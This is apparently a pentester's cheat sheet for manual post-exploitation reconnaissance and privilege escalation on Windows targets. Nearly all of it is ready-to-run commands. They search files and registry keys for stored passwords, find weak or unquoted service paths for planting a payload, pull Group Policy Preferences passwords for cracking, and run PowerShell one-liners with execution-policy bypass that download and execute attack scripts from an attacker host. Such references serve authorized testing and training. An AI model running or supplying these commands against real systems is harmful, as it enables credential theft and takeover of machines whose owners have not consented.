Windows enumeration
Manual post exploitation recon for windows targets
#Basics
#systeminfo
hostname
# Who am I?
whoami
echo %username%
# What users/localgroups are on the machine?
net users
net localgroups
# More info about a specific user. Check if user has privileges.
net user user1
# View Domain Groups
net group /domain
# View Members of Domain Group
net group /domain <Group Name>
# Firewall
netsh firewall show state
netsh firewall show config
# Network
ipconfig /all
route print
arp -A
# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn#Cleartext passwords
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*#Passwords in files
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini#Passwords in registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s#Checking for Kernel exploits
systeminfo
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn#Scheduled tasks
schtasks /query /fo LIST /v#Weak service permissions
#will spit out a ton of output
wmic service list brief
#To prune the output into something more manageable,leverage wimc and icalcs
from C:\Windows\temp | try:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
Then:
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
#sc.exe
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
#Unquoted service paths:If the path contains a space and is not quoted,the service is vulnerable.
# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
# Using sc
sc query
sc qc service name
# Look for Binary_path_name and see if it is unquoted.
#Example of an unquoted executable:
c:\Program Files\something\winamp.exe
#We can place a payload like this:
c:\evil.exe
#There is also a metasploit module:
exploit/windows/local/trusted_service_path#Check for vulnerable drivers
# List all drivers
driverquery#Group policy preferences
# Output environment-variables
set
# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=EXAMPLE.LOCAL
# Look up ip-addres
nslookup nameofserver.example.local
# It will output something like this
Address: 192.168.1.101
# Now you can mount it
net use z: \\192.168.1.101\SYSVOL
# Enter
z:
# Now search for the groups.xml file
dir Groups.xml /s
#If an encrypted password is found , exfile to kali and crack:
gpp-decrypt encryptedpassword
#Pint test blind RCE
C:\Windows\System32\cmd.exe /c ping 10.10.10.10 # on linux box: tcpdump -i tun0 icmp
#Same if powershell is available
C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping 10.10.10.10#Firewall / AV / Defender
netsh firewall show state
netsh firewall show config
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state#Automated tools checklist
#Run winpeas
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUp.ps1');Invoke-AllChecks"
#Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns"
#Run JAWS
# Executables
WinPEAS.exe /.bat *
Seatbelt.exe
Watson.exe *
Sharpup.exe
windows-privesc-check2.exe --dump -G
#Powershell
Sherlock.ps1 *
PowerUp.ps1 *
jaws-enumps1 *
#Other
Windows-exploit-suggester.py *
Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github
MSF exploit suggester *
In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernelLast updated